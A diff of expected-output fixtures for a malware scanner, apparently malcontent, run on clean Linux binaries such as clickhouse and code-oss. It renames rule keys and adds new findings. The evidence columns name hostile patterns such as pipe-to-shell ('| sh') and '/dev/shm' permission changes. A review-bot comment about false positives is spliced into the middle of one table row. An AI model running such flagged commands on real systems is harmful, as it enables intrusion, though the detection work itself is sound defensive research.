 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
 c2/refs: medium
-c2/server_address: medium
 c2/tool_transfer/dropper: medium
 collect/archives/zip: medium
 collect/databases/leveldb: medium
@@ -38,14 +38,17 @@ data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
+discover/process/name: medium
+discover/process/parent: low
+discover/process/runtime_deps: medium
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
+evasion/file/location/dev_shm: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/process_injection/ptrace: medium
 exec/cmd: medium
@@ -109,7 +112,6 @@ fs/watch: low
 hw/cpu: medium
 hw/dev/block_ice: medium
 hw/wireless: low
-impact/exploit/GCONV_PATH: low
 impact/ransom/decryptor: medium
 impact/remote_access/heartbeat: medium
 lateral/scan/target_ip: medium
@@ -162,9 +164,6 @@ process/chroot: low
 process/create: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
-process/parent_pid_get: low
-process/thread_local_storage: low
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index 9dc863651..bd77a7ee6 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -6,8 +6,8 @@
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/dyndns: medium
-c2/server_address: medium
 c2/tool_transfer/download: medium
 c2/tool_transfer/grayware: high
 collect/databases/leveldb: medium
@@ -42,20 +42,22 @@ data/hash/sha256: low
 data/hash/whirlpool: medium
 data/random/insecure: low
 discover/cloud/google_metadata: low
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/interface_list: medium
 discover/permissions/capabilities: medium
+discover/process/name: medium
+discover/process/runtime_deps: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
 evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/relative_hidden: low
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: medium
 evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/acct: low
@@ -69,6 +71,7 @@ exec/install_additional/package_install: medium
 exec/plugin: low
 exec/program: medium
 exec/program/background: low
+exec/program/hidden: medium
 exec/shell/SHELL: low
 exec/shell/TERM: low
 exec/shell/background_sleep: medium
@@ -181,8 +184,6 @@ process/create: low
 process/executable_path: low
 process/groupid_set: low
 process/multithreaded: low
-process/name_get: medium
-process/thread_local_storage: low
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index e15d38abd..8b39a12e5 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [http://arianna.libero.it/search/abin/integrata.cgi?query=](http://arianna.libero.it/search/abin/integrata.cgi?query=)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.goo.ne.jp/sgt.jsp?MT=](http://search.goo.ne.jp/sgt.jsp?MT=)
[http://search.goo.ne.jp/web.jsp?MT=](http://search.goo.ne.jp/web.jsp?MT=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.goo.ne.jp/sgt.jsp?MT=](https://search.goo.ne.jp/sgt.jsp?MT=)
[https://search.goo.ne.jp/web.jsp?MT=](https://search.goo.ne.jp/web.jsp?MT=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[https://search.yahoo.com?fr=crmas_sfp](https://search.yahoo.com?fr=crmas_sfp)
[https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=](https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | | MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | @@ -11,9 +11,9 @@ | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) |
 | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) |
 | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) |
 | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) |
 | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) |
 | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) |
@@ -26,6 +26,8 @@
 | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) |
 | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
 | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
+| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
 | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) |
 | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
 | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) |
@@ -33,6 +35,7 @@
 | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
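Review bot: The `__tls_get_addr` evidence is re-filed from the LOW `process/thread_local_storage` row (removed in hunk `@@ -170,7 +172,5 @@`) to the MEDIUM `discover/process/runtime_deps` row added in this hunk, with a description that now asserts possible loaded-library discovery. `__tls_get_addr` is the ordinary dynamic-TLS accessor the toolchain emits for any shared object that touches thread-local data, so a MEDIUM finding on that symbol alone will lift the score of most dynamically linked Linux binaries; if this fixture is a clean sample, as its neighbours under tests/linux/clean/ suggest, the new expectation records a false positive rather than a detection. Consider keeping the rule at low until it is combined with stronger indicators, or tightening the condition in runtime_deps.yara so that the bare symbol does not satisfy it, and then regenerating the fixture. The same generic-vocabulary concern applies to the new `lateral/scan/tool` row in hunk `@@ -59,6 +62,7 @@`, whose evidence (`port`, `probe`, `scan`, `socket`, `target`) is common wording in any networking code.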
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) |
 | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
 | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
+| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) |
 | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) |
 | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) |
 | MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) |
@@ -59,6 +62,7 @@
 | MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) |
 | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) |
 | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
 | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) |
 | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) |
 | MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) |
@@ -81,7 +85,6 @@
 | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) |
 | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) |
 | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) |
-| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
 | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) |
 | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) |
 | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
@@ -101,11 +104,11 @@
 | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
 | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
 | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
